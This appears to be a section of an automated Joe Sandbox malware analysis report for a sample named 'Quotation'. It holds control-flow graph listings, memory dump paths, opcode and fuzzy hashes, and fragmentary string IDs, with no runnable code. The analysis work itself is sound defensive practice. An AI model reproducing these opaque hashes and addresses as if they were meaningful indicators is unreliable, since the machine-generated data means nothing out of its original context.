42467 37237002 CallWindowProcW 42466->42467 42469 37236fb1 42466->42469 42467->42469 42468->42469 42469->42461

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 36d53108-36d53129 1 36d5312b-36d5312e 0->1 2 36d53134-36d53153 1->2 3 36d538cf-36d538d2 1->3 12 36d53155-36d53158 2->12 13 36d5316c-36d53176 2->13 4 36d538d4-36d538f3 3->4 5 36d538f8-36d538fa 3->5 4->5 7 36d53901-36d53904 5->7 8 36d538fc 5->8 7->1 10 36d5390a-36d53913 7->10 8->7 12->13 15 36d5315a-36d5316a 12->15 18 36d5317c-36d5318b 13->18 15->18 126 36d5318d call 36d53921 18->126 127 36d5318d call 36d53928 18->127 19 36d53192-36d53197 20 36d531a4-36d53481 19->20 21 36d53199-36d5319f 19->21 42 36d53487-36d53536 20->42 43 36d538c1-36d538ce 20->43 21->10 52 36d5355f 42->52 53 36d53538-36d5355d 42->53 54 36d53568-36d5357b 52->54 53->54 57 36d53581-36d535a3 54->57 58 36d538a8-36d538b4 54->58 57->58 61 36d535a9-36d535b3 57->61 58->42 59 36d538ba 58->59 59->43 61->58 62 36d535b9-36d535c4 61->62 62->58 63 36d535ca-36d536a0 62->63 75 36d536a2-36d536a4 63->75 76 36d536ae-36d536de 63->76 75->76 80 36d536e0-36d536e2 76->80 81 36d536ec-36d536f8 76->81 80->81 82 36d53758-36d5375c 81->82 83 36d536fa-36d536fe 81->83 84 36d53762-36d5379e 82->84 85 36d53899-36d538a2 82->85 83->82 86 36d53700-36d5372a 83->86 96 36d537a0-36d537a2 84->96 97 36d537ac-36d537ba 84->97 85->58 85->63 93 36d5372c-36d5372e 86->93 94 36d53738-36d53755 86->94 93->94 94->82 96->97 100 36d537d1-36d537dc 97->100 101 36d537bc-36d537c7 97->101 104 36d537f4-36d53805 100->104 105 36d537de-36d537e4 100->105 101->100 106 36d537c9 101->106 110 36d53807-36d5380d 104->110 111 36d5381d-36d53829 104->111 107 36d537e6 105->107 108 36d537e8-36d537ea 105->108 106->100 107->104 108->104 112 36d53811-36d53813 110->112 113 36d5380f 110->113 115 36d53841-36d53892 111->115 116 36d5382b-36d53831 111->116 112->111 113->111 115->85 117 36d53835-36d53837 116->117 118 36d53833 116->118 117->115 118->115 126->19 127->19
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,FI6$$]q$$]q$$]q$$]q$$]q$$]q$FI6
                                                                • API String ID: 0-2013510491
                                                                • Opcode ID: 2f18c6c396f36bf156fe42519bde4eff3e71e5a0d86ae328cbc1ce7613704774
                                                                • Instruction ID: c3f772c1b343769ac96b1c0b1f19f63bb4ad5d4a09d73dd88e753ea35d38fca7
                                                                • Opcode Fuzzy Hash: 2f18c6c396f36bf156fe42519bde4eff3e71e5a0d86ae328cbc1ce7613704774
                                                                • Instruction Fuzzy Hash: A6324D30E1071ACBDB15DF79C89459DB7B2FFC9300F61C66AD409AB624EB30A985CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,DI6$,DI6$FI6
                                                                • API String ID: 0-1582849963
                                                                • Opcode ID: f897209d37c285fe899751eb5153d43de9ac419d148ff288b4cd60e047a10c60
                                                                • Instruction ID: ba953c0b814a288baf20d53d144edb6c6fc02c8a0841353afe3ef0359e90b923
                                                                • Opcode Fuzzy Hash: f897209d37c285fe899751eb5153d43de9ac419d148ff288b4cd60e047a10c60
                                                                • Instruction Fuzzy Hash: 30923638E002048FEB14DF68C584A99B7F2FB49354F6684A9D509AB766DB35EC85CF80

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1516 36d57e20-36d57e3e 1517 36d57e40-36d57e43 1516->1517 1518 36d57e45-36d57e61 1517->1518 1519 36d57e66-36d57e69 1517->1519 1518->1519 1520 36d57e6b-36d57e85 1519->1520 1521 36d57e8a-36d57e8d 1519->1521 1520->1521 1523 36d57ea4-36d57ea7 1521->1523 1524 36d57e8f-36d57e9d 1521->1524 1525 36d57eb4-36d57eb6 1523->1525 1526 36d57ea9-36d57eb3 1523->1526 1532 36d57ec6-36d57edc 1524->1532 1533 36d57e9f 1524->1533 1529 36d57ebd-36d57ec0 1525->1529 1530 36d57eb8 1525->1530 1529->1517 1529->1532 1530->1529 1536 36d580f7-36d58101 1532->1536 1537 36d57ee2-36d57eeb 1532->1537 1533->1523 1538 36d57ef1-36d57f0e 1537->1538 1539 36d58102-36d58137 1537->1539 1546 36d580e4-36d580f1 1538->1546 1547 36d57f14-36d57f3c 1538->1547 1542 36d58139-36d5813c 1539->1542 1544 36d58142-36d5814e 1542->1544 1545 36d581ef-36d581f2 1542->1545 1550 36d58159-36d5815b 1544->1550 1548 36d5841e-36d58421 1545->1548 1549 36d581f8-36d58207 1545->1549 1546->1536 1546->1537 1547->1546 1574 36d57f42-36d57f4b 1547->1574 1551 36d58444-36d58446 1548->1551 1552 36d58423-36d5843f 1548->1552 1565 36d58226-36d58261 1549->1565 1566 36d58209-36d58224 1549->1566 1556 36d58173-36d5817a 1550->1556 1557 36d5815d-36d58163 1550->1557 1553 36d5844d-36d58450 1551->1553 1554 36d58448 1551->1554 1552->1551 1553->1542 1559 36d58456-36d5845f 1553->1559 1554->1553 1562 36d5817c-36d58189 1556->1562 1563 36d5818b 1556->1563 1560 36d58165 1557->1560 1561 36d58167-36d58169 1557->1561 1560->1556 1561->1556 1568 36d58190-36d58192 1562->1568 1563->1568 1575 36d58267-36d58278 1565->1575 1576 36d583f2-36d58407 1565->1576 1566->1565 1569 36d58194-36d58197 1568->1569 1570 36d581a9-36d581e2 1568->1570 1569->1559 1570->1549 1595 36d581e4-36d581ee 1570->1595 1574->1539 1577 36d57f51-36d57f6d 1574->1577 1584 36d583dd-36d583ec 1575->1584 1585 36d5827e-36d5829b 1575->1585 1576->1548 1586 36d57f73-36d57f9d 1577->1586 1587 36d580d2-36d580de 1577->1587 1584->1575 1584->1576 1585->1584 1596 36d582a1-36d58397 call 36d56648 1585->1596 1599 36d57fa3-36d57fcb 1586->1599 1600 36d580c8-36d580cd 1586->1600 1587->1546 1587->1574 1648 36d583a5 1596->1648 1649 36d58399-36d583a3 1596->1649 1599->1600 1606 36d57fd1-36d57fff 1599->1606 1600->1587 1606->1600 1612 36d58005-36d5800e 1606->1612 1612->1600 1613 36d58014-36d58046 1612->1613 1621 36d58051-36d5806d 1613->1621 1622 36d58048-36d5804c 1613->1622 1621->1587 1624 36d5806f-36d580c6 call 36d56648 1621->1624 1622->1600 1623 36d5804e 1622->1623 1623->1621 1624->1587 1650 36d583aa-36d583ac 1648->1650 1649->1650 1650->1584 1651 36d583ae-36d583b3 1650->1651 1652 36d583b5-36d583bf 1651->1652 1653 36d583c1 1651->1653 1654 36d583c6-36d583c8 1652->1654 1653->1654 1654->1584 1655 36d583ca-36d583d6 1654->1655 1655->1584
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: DRI6$$]q$$]q
                                                                • API String ID: 0-2305033372
                                                                • Opcode ID: 3a9130f243b52be1b0aad262ad9ca74b2c7f551197df0e4b6c75f67de063c176
                                                                • Instruction ID: 39a897521e15fca8ec816b2273ce52799686cd727c0ebb5caf9079e9008611a5
                                                                • Opcode Fuzzy Hash: 3a9130f243b52be1b0aad262ad9ca74b2c7f551197df0e4b6c75f67de063c176
                                                                • Instruction Fuzzy Hash: AD02AD34B002298FEB08DF69D890A9EB7E6FF84344F218529D505EB795DB35EC46CB81
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 97478458024c3cd2e57bce7d11a87abe127caa14efcdf1f98bd6409e8245bf07
                                                                • Instruction ID: 5ee8a2d7cf6dd5ac13b8405220b6177b83f08ff98d8a5ad0edf6b329266e4b3e
                                                                • Opcode Fuzzy Hash: 97478458024c3cd2e57bce7d11a87abe127caa14efcdf1f98bd6409e8245bf07
                                                                • Instruction Fuzzy Hash: 3F63F731D10B1A8ECB11EF68C8945A9F7B1FF99300F51D79AE4587B121EB70AAD4CB81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,DI6
                                                                • API String ID: 0-1379044179
                                                                • Opcode ID: 9120fc03834c8f87ad85bf3495330efa8fc0c90bf0954d4a272a8bbddca02d38
                                                                • Instruction ID: 049da8da4e492a94912d62bc05e6746e437737b2052b7bb3d75f98dc85843b7c
                                                                • Opcode Fuzzy Hash: 9120fc03834c8f87ad85bf3495330efa8fc0c90bf0954d4a272a8bbddca02d38
                                                                • Instruction Fuzzy Hash: 8062AC38B002048FEF14DB68D594A9DBBF2EF88354F218569E505EB7A1DB35EC46CB81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $
                                                                • API String ID: 0-3993045852
                                                                • Opcode ID: 61ecc784c5858324154eefdc83075b5db55805127e5053526ce79f45edceed35
                                                                • Instruction ID: 3cc7f5fe33253f2b892600aefa8e8c94b82c114719082d0e8dd879f090f33e92
                                                                • Opcode Fuzzy Hash: 61ecc784c5858324154eefdc83075b5db55805127e5053526ce79f45edceed35
                                                                • Instruction Fuzzy Hash: 6122E079E002058FEF15CFA4C48069EBBF2EF84364F22846AD649AB745DB35DC42CB91
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8dac9edfee197f91bc2ef3d90db14327ef6b5f7a05edb5edc2a703aa37d89882
                                                                • Instruction ID: d605dea52146890994e7967aa979e838a641a86bc3fa49833949a6a5a8b814e6
                                                                • Opcode Fuzzy Hash: 8dac9edfee197f91bc2ef3d90db14327ef6b5f7a05edb5edc2a703aa37d89882
                                                                • Instruction Fuzzy Hash: 66328E34F002059FEF04CB68D890A9EBBB6EF8A354F218529E505EB751DB35EC46CB91
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5d289098a170477d436807add5c2cc5d7d0c77c49cd88ab1212f38d92558ac25
                                                                • Instruction ID: 0ba089e43bb67b101e9f12040f438d0bcac1dc57c11d7f2e5f326f1062e5382d
                                                                • Opcode Fuzzy Hash: 5d289098a170477d436807add5c2cc5d7d0c77c49cd88ab1212f38d92558ac25
                                                                • Instruction Fuzzy Hash: 30226078E002098FEF14CB69C4A079DB7B6FB49350F218925E509EBB91DB35DC86CB91
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6d68ae2dc388ace0d9d65387af3a5542bd1a051006d5efeb5eb9332ac816514a
                                                                • Instruction ID: fad66290453a4b64f6b3f57584ffed7903f57e15f0e9d229ea32645d2b15689a
                                                                • Opcode Fuzzy Hash: 6d68ae2dc388ace0d9d65387af3a5542bd1a051006d5efeb5eb9332ac816514a
                                                                • Instruction Fuzzy Hash: BBD1AE30A40205CFDB14CF68D880B9EBBB6EF88311F508669E919DF295E771DC49CB92
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c3cbf7c7feee930b8b6dd7b7e467ba67dbfdb657c79f4fb0e8144227a80843cd
                                                                • Instruction ID: 22c84c2aa022079d92dc708bfae26a0286deb70cceaf6ce9d59f65581e39df05
                                                                • Opcode Fuzzy Hash: c3cbf7c7feee930b8b6dd7b7e467ba67dbfdb657c79f4fb0e8144227a80843cd
                                                                • Instruction Fuzzy Hash: 7BC10371B00211DFDB24CB68C890A6EBBB6EF85311F248569E829CF295CB31EC46C7D1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 82668cd70ac35abc24ed038185697ed5ce9c3c8f1290f91e145eb2ade0afaf05
                                                                • Instruction ID: 9b2d663aa150bcfb93550f6c111a6b4ca480a211d4437b8ef58a60759525c918
                                                                • Opcode Fuzzy Hash: 82668cd70ac35abc24ed038185697ed5ce9c3c8f1290f91e145eb2ade0afaf05
                                                                • Instruction Fuzzy Hash: CFB16570E00209DFDF14CFA9C9957DDBBF2AF88319F148529D825EB254EB749889CB81
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54ad37cc7ef03c9f036b016825151306598ebaad576b80a280411a7368c34c8e
                                                                • Instruction ID: 8ccf3326f3bebff8148bd158caa98f10546322ec8db322077261ee68c168be93
                                                                • Opcode Fuzzy Hash: 54ad37cc7ef03c9f036b016825151306598ebaad576b80a280411a7368c34c8e
                                                                • Instruction Fuzzy Hash: D9919470E00609DFDF14CFA9C9857DEBBF1AF88305F148129E825EB254DB749989CB81

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 128 36d5b6e8-36d5b708 129 36d5b70a-36d5b70d 128->129 130 36d5b717-36d5b71a 129->130 131 36d5b70f-36d5b714 129->131 132 36d5b734-36d5b737 130->132 133 36d5b71c-36d5b722 130->133 131->130 136 36d5b739-36d5b740 132->136 137 36d5b74b-36d5b74e 132->137 134 36d5ba83-36d5babe 133->134 135 36d5b728-36d5b72f 133->135 147 36d5bac0-36d5bac3 134->147 135->132 138 36d5b746 136->138 139 36d5b81e-36d5b827 136->139 140 36d5b761-36d5b764 137->140 141 36d5b750-36d5b75c 137->141 138->137 145 36d5b82c-36d5b82f 139->145 143 36d5b95c-36d5b962 140->143 144 36d5b76a-36d5b76d 140->144 141->140 143->133 150 36d5b968 143->150 148 36d5b914-36d5b915 144->148 149 36d5b773-36d5b776 144->149 151 36d5b831-36d5b837 145->151 152 36d5b83c-36d5b83f 145->152 154 36d5bac5-36d5bae1 147->154 155 36d5bae6-36d5bae9 147->155 153 36d5b91a-36d5b91d 148->153 156 36d5b7b5-36d5b7b8 149->156 157 36d5b778-36d5b78d 149->157 158 36d5b96d-36d5b970 150->158 151->152 159 36d5b851-36d5b854 152->159 160 36d5b841 152->160 161 36d5b944-36d5b947 153->161 162 36d5b91f-36d5b923 153->162 154->155 165 36d5bd55-36d5bd57 155->165 166 36d5baef-36d5bb17 155->166 167 36d5b7da-36d5b7dd 156->167 168 36d5b7ba-36d5b7d5 156->168 157->134 186 36d5b793-36d5b7b0 157->186 169 36d5b980-36d5b983 158->169 170 36d5b972-36d5b97b 158->170 163 36d5b856-36d5b85a 159->163 164 36d5b87b-36d5b87e 159->164 171 36d5b849-36d5b84c 160->171 177 36d5b957-36d5b95a 161->177 178 36d5b949-36d5b952 161->178 162->134 172 36d5b929-36d5b939 162->172 163->134 173 36d5b860-36d5b870 163->173 179 36d5b880-36d5b8ce call 36d56648 164->179 180 36d5b8d3-36d5b8d6 164->180 175 36d5bd5e-36d5bd61 165->175 176 36d5bd59 165->176 238 36d5bb21-36d5bb65 166->238 239 36d5bb19-36d5bb1c 166->239 183 36d5b7f3-36d5b7f6 167->183 184 36d5b7df-36d5b7e8 167->184 168->167 181 36d5b985-36d5b99a 169->181 182 36d5b9c1-36d5b9c4 169->182 170->169 171->159 209 36d5ba3c-36d5ba40 172->209 210 36d5b93f 172->210 173->148 211 36d5b876 173->211 175->147 187 36d5bd67-36d5bd70 175->187 176->175 177->143 177->158 178->177 179->180 180->148 195 36d5b8d8-36d5b8db 180->195 181->134 215 36d5b9a0-36d5b9bc 181->215 193 36d5b9c6-36d5b9ca 182->193 194 36d5b9db-36d5b9de 182->194 191 36d5b819-36d5b81c 183->191 192 36d5b7f8-36d5b814 183->192 189 36d5ba17-36d5ba20 184->189 190 36d5b7ee 184->190 186->156 189->134 197 36d5ba22-36d5ba29 189->197 190->183 191->139 191->145 192->191 193->134 203 36d5b9d0-36d5b9d6 193->203 204 36d5b9e0-36d5b9e3 194->204 205 36d5b9e8-36d5b9eb 194->205 206 36d5b8dd-36d5b8e6 195->206 207 36d5b8eb-36d5b8ee 195->207 208 36d5ba2e-36d5ba31 197->208 203->194 204->205 217 36d5ba02-36d5ba05 205->217 218 36d5b9ed-36d5b9f1 205->218 206->207 219 36d5b8f5-36d5b8f8 207->219 220 36d5b8f0-36d5b8f2 207->220 208->148 222 36d5ba37-36d5ba3a 208->222 209->134 223 36d5ba42-36d5ba52 209->223 210->161 211->164 215->182 228 36d5ba07-36d5ba0d 217->228 229 36d5ba12-36d5ba15 217->229 218->134 225 36d5b9f7-36d5b9fd 218->225 226 36d5b90f-36d5b912 219->226 227 36d5b8fa-36d5b8fe 219->227 220->219 222->209 230 36d5ba5d-36d5ba60 222->230 223->163 240 36d5ba58 223->240 225->217 226->148 226->153 227->134 233 36d5b904-36d5b90a 227->233 228->229 229->189 229->208 230->184 236 36d5ba66-36d5ba68 230->236 233->226 241 36d5ba6f-36d5ba72 236->241 242 36d5ba6a 236->242 250 36d5bb6b-36d5bb74 238->250 251 36d5bd4a-36d5bd54 238->251 239->187 240->230 241->129 244 36d5ba78-36d5ba82 241->244 242->241 252 36d5bd40-36d5bd45 250->252 253 36d5bb7a-36d5bbe6 call 36d56648 250->253 252->251 262 36d5bce0-36d5bcf5 253->262 263 36d5bbec-36d5bbf1 253->263 262->252 264 36d5bbf3-36d5bbf9 263->264 265 36d5bc0d 263->265 267 36d5bbff-36d5bc01 264->267 268 36d5bbfb-36d5bbfd 264->268 269 36d5bc0f-36d5bc15 265->269 270 36d5bc0b 267->270 268->270 271 36d5bc17-36d5bc1d 269->271 272 36d5bc2a-36d5bc37 269->272 270->269 273 36d5bc23 271->273 274 36d5bccb-36d5bcda 271->274 278 36d5bc4f-36d5bc5c 272->278 279 36d5bc39-36d5bc3f 272->279 273->272 275 36d5bc92-36d5bc9f 273->275 276 36d5bc5e-36d5bc6b 273->276 274->262 274->263 288 36d5bcb7-36d5bcc4 275->288 289 36d5bca1-36d5bca7 275->289 286 36d5bc83-36d5bc90 276->286 287 36d5bc6d-36d5bc73 276->287 278->274 281 36d5bc41 279->281 282 36d5bc43-36d5bc45 279->282 281->278 282->278 286->274 290 36d5bc75 287->290 291 36d5bc77-36d5bc79 287->291 288->274 292 36d5bca9 289->292 293 36d5bcab-36d5bcad 289->293 290->286 291->286 292->288 293->288
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (\I6$(\I6$$]q$$]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-2034685594
                                                                • Opcode ID: e84b9856b7e02c13e4ea52f221017fb6d5f430ebd2d7d2195e42755e696323a1
                                                                • Instruction ID: 9f6aee205d3647dd749b4d7174a92a9c7bb258d6d449a7532bfe35ae8ea87798
                                                                • Opcode Fuzzy Hash: e84b9856b7e02c13e4ea52f221017fb6d5f430ebd2d7d2195e42755e696323a1
                                                                • Instruction Fuzzy Hash: C0026934E002098FEF14CF68C4A0B9DBBB2EF85344F21856AE509EBA51DB75DD46CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 296 36d5af2d-36d5af31 297 36d5af32 296->297 298 36d5afa8-36d5afce 296->298 299 36d5af36-36d5af38 297->299 300 36d5af33-36d5af34 297->300 301 36d5afd0-36d5afd3 298->301 302 36d5af42-36d5af73 299->302 300->302 303 36d5afd5 call 36d5b2ba 301->303 304 36d5afe2-36d5afe5 301->304 334 36d5af7a 302->334 307 36d5afdb-36d5afdd 303->307 305 36d5afe7-36d5afeb 304->305 306 36d5aff2-36d5aff5 304->306 309 36d5afed 305->309 310 36d5b00b-36d5b046 305->310 311 36d5aff7-36d5b001 306->311 312 36d5b002-36d5b005 306->312 307->304 309->306 318 36d5b04c-36d5b058 310->318 319 36d5b239-36d5b24c 310->319 312->310 313 36d5b26e-36d5b271 312->313 315 36d5b294-36d5b296 313->315 316 36d5b273-36d5b28f 313->316 320 36d5b29d-36d5b2a0 315->320 321 36d5b298 315->321 316->315 327 36d5b078-36d5b0bc 318->327 328 36d5b05a-36d5b073 318->328 322 36d5b24e 319->322 320->301 324 36d5b2a6-36d5b2b0 320->324 321->320 330 36d5b24f 322->330 357 36d5b0be-36d5b0d0 327->357 358 36d5b0d8-36d5b117 327->358 328->322 330->330 336 36d5af7d-36d5af86 334->336 337 36d5ad92-36d5ad9b 336->337 338 36d5af8c-36d5af96 336->338 339 36d5af97-36d5afa4 337->339 340 36d5ada1-36d5ada5 337->340 350 36d5af74-36d5af79 339->350 351 36d5afa7 339->351 342 36d5adaa-36d5adad 340->342 343 36d5adaf-36d5adb3 342->343 344 36d5adbe-36d5adc1 342->344 343->338 347 36d5adb9 343->347 348 36d5add1-36d5add4 344->348 349 36d5adc3-36d5adcc 344->349 347->344 353 36d5adf7-36d5adfa 348->353 354 36d5add6-36d5adf2 348->354 349->348 350->334 351->298 355 36d5ae14-36d5ae17 353->355 356 36d5adfc-36d5ae0f 353->356 354->353 355->336 359 36d5ae1d-36d5ae20 355->359 356->355 357->358 368 36d5b11d-36d5b1f8 call 36d56648 358->368 369 36d5b1fe-36d5b213 358->369 363 36d5ae34-36d5ae36 359->363 364 36d5ae22-36d5ae2f 359->364 366 36d5ae3d-36d5ae40 363->366 367 36d5ae38 363->367 364->363 374 36d5ae46-36d5ae6a 366->374 375 36d5ad80-36d5ad83 366->375 367->366 368->369 369->319 374->334 383 36d5ae70-36d5ae7f 374->383 376 36d5ad85-36d5ad8a 375->376 377 36d5ad8d-36d5ad90 375->377 376->377 377->337 377->342 387 36d5ae97-36d5aed2 call 36d56648 383->387 388 36d5ae81-36d5ae87 383->388 402 36d5aed4-36d5aeda 387->402 403 36d5aeea-36d5af01 387->403 389 36d5ae89 388->389 390 36d5ae8b-36d5ae8d 388->390 389->387 390->387 405 36d5aedc 402->405 406 36d5aede-36d5aee0 402->406 411 36d5af03-36d5af09 403->411 412 36d5af19-36d5af2a 403->412 405->403 406->403 414 36d5af0d-36d5af0f 411->414 415 36d5af0b 411->415 412->302 417 36d5af2c 412->417 414->412 415->412 417->296
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-1273862796
                                                                • Opcode ID: 97f39179b815648b98537b364c2e701249b2a33e967c65a3aab7024e9af0b535
                                                                • Instruction ID: 5a2c0ed6121b88737e601d41986481deb6b1944b89c82c303c88aa6e25141580
                                                                • Opcode Fuzzy Hash: 97f39179b815648b98537b364c2e701249b2a33e967c65a3aab7024e9af0b535
                                                                • Instruction Fuzzy Hash: 5E712234F002188FEF19DB68D89068E77F6EF85351F29892AE945DB644DB74DC42CB81

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 425 158729-15873f 426 158741-158744 425->426 427 158746-15876c 426->427 428 158771-158774 426->428 427->428 429 158776-15879c 428->429 430 1587a1-1587a4 428->430 429->430 431 1587a6-1587cc 430->431 432 1587d1-1587d4 430->432 431->432 434 1587d6-1587fc 432->434 435 158801-158804 432->435 434->435 438 158806-15882c 435->438 439 158831-158834 435->439 438->439 441 158836-15885c 439->441 442 158861-158864 439->442 441->442 447 158866-15888c 442->447 448 158891-158894 442->448 447->448 450 1588a5-1588a8 448->450 451 158896-158898 448->451 457 1588b5-1588b8 450->457 458 1588aa 450->458 639 15889a call 159f70 451->639 640 15889a call 159f80 451->640 641 15889a call 15a023 451->641 463 1588e5-1588e8 457->463 464 1588ba-1588e0 457->464 469 1588b0 458->469 460 1588a0 460->450 467 158915-158918 463->467 468 1588ea-158910 463->468 464->463 471 158945-158948 467->471 472 15891a-158940 467->472 468->467 469->457 475 158975-158978 471->475 476 15894a-158970 471->476 472->471 479 1589a5-1589a8 475->479 480 15897a-1589a0 475->480 476->475 482 1589d5-1589d8 479->482 483 1589aa-1589d0 479->483 480->479 488 158a05-158a08 482->488 489 1589da-158a00 482->489 483->482 491 158a35-158a38 488->491 492 158a0a-158a30 488->492 489->488 498 158a65-158a68 491->498 499 158a3a-158a60 491->499 492->491 501 158a95-158a98 498->501 502 158a6a-158a90 498->502 499->498 508 158ac5-158ac8 501->508 509 158a9a-158ac0 501->509 502->501 511 158af5-158af8 508->511 512 158aca-158af0 508->512 509->508 518 158b25-158b28 511->518 519 158afa-158b20 511->519 512->511 521 158b55-158b58 518->521 522 158b2a-158b50 518->522 519->518 528 158b85-158b88 521->528 529 158b5a-158b80 521->529 522->521 531 158bb5-158bb8 528->531 532 158b8a-158bb0 528->532 529->528 538 158be5-158be8 531->538 539 158bba-158be0 531->539 532->531 541 158c15-158c18 538->541 542 158bea-158c10 538->542 539->538 548 158c45-158c48 541->548 549 158c1a-158c40 541->549 542->541 551 158c65-158c68 548->551 552 158c4a-158c60 548->552 549->548 558 158c95-158c98 551->558 559 158c6a-158c90 551->559 552->551 561 158cc5-158cc8 558->561 562 158c9a-158cc0 558->562 559->558 568 158cf5-158cf8 561->568 569 158cca-158cf0 561->569 562->561 571 158d25-158d28 568->571 572 158cfa-158d20 568->572 569->568 577 158d55-158d58 571->577 578 158d2a-158d50 571->578 572->571 581 158d85-158d88 577->581 582 158d5a-158d80 577->582 578->577 586 158db5-158db8 581->586 587 158d8a-158db0 581->587 582->581 590 158de5-158de8 586->590 591 158dba-158de0 586->591 587->586 596 158e15-158e18 590->596 597 158dea-158e10 590->597 591->590 600 158e45-158e48 596->600 601 158e1a-158e40 596->601 597->596 606 158e75-158e78 600->606 607 158e4a-158e70 600->607 601->600 610 158ea5-158ea8 606->610 611 158e7a-158ea0 606->611 607->606 616 158ec3-158ec6 610->616 617 158eaa-158eb6 610->617 611->610 620 158ef3-158ef5 616->620 621 158ec8-158eee 616->621 635 158ebe 617->635 626 158ef7 620->626 627 158efc-158eff 620->627 621->620 626->627 627->426 633 158f05-158f0b 627->633 635->616 639->460 640->460 641->460
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8I6$@ I6$`I6$`"I6$p$I6
                                                                • API String ID: 0-176825592
